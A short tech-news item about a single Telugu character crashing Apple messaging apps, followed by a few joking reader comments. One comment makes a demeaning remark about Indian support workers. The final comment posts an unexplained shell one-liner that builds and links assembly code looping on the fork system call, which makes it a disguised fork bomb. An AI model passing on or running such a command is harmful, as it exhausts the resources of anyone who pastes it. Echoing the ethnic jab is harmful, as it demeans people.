Mac and iOS Bug Crashes Apps With a Single Indian-Language Character (mashable.com)
A lone Indian-language character is crashing a number of messaging apps on iOS, users are reporting. The problem also extends to the Apple Watch and even Macs, all of which struggle to process the character specific to the Telugu language spoken in India.
And I thought it was bad enough trying to understand them on support calls......
Light travels faster than sound. This is why some people appear bright until you hear them speak.........
We all need to adopt the Mojibake standard for non ASCII characters, like Slashdot.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;